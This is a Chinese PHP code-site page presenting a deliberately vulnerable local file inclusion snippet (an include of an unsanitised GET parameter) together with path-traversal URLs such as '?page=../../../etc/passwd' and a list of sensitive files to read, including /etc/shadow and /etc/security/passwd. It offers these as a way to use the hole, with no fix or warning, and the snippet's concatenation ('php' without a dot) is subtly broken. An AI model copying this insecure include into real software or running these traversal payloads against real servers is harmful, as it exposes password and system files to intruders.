php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

PHP使用XMLWriter读写xml文件操作详解

本文实例讲述了PHP使用XMLWriter读写xml文件操作。分享给大家供大家参考，具体如下：米扑科技旗下的多个产品，需要脚本自动生成sitemap.xml，于是重新温习一遍PHP X...

简单概括PHP的字符串中单引号与双引号的区别

今天有个朋友问起,说下区别,顺便复习下。单引号与双引号的不同： " "双引号里面的字段会经过编译器解释，然后再当作HTML代码输出。 ' '单引号里面的不进行解释，直接输出。...

ThinkPHP like模糊查询,like多匹配查询,between查询,in查询,一般查询书写方法

ThinkPHP的数据库条件查询语句有字符串式，数组式书写方法字符串式即是原生式，数组式查询语句因书写方式与特定字符的原因比较复杂，下面为大家例出了常用的ThinkPHP数组式查询语句...

解析thinkphp中的导入文件标签

第一个是import标签，导入方式采用类似ThinkPHP的import函数的命名空间方式，例如： import标签（采用命名空间方式引入资源文件）闭合闭合标签...

PHP 缓存实现代码及详细注释

复制代码代码如下:class CacheException extends Exception {} /** * 缓存抽象类 */ abstract class Cache_Abstr...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP使用XMLWriter读写xml文件操作详解

简单概括PHP的字符串中单引号与双引号的区别

ThinkPHP like模糊查询,like多匹配查询,between查询,in查询,一般查询书写方法

解析thinkphp中的导入文件标签

PHP 缓存实现代码及详细注释

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP使用XMLWriter读写xml文件操作详解

简单概括PHP的字符串中单引号与双引号的区别

ThinkPHP like模糊查询,like多匹配查询,between查询,in查询,一般查询书写方法

解析thinkphp中的导入文件标签

PHP 缓存实现代码及详细注释

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号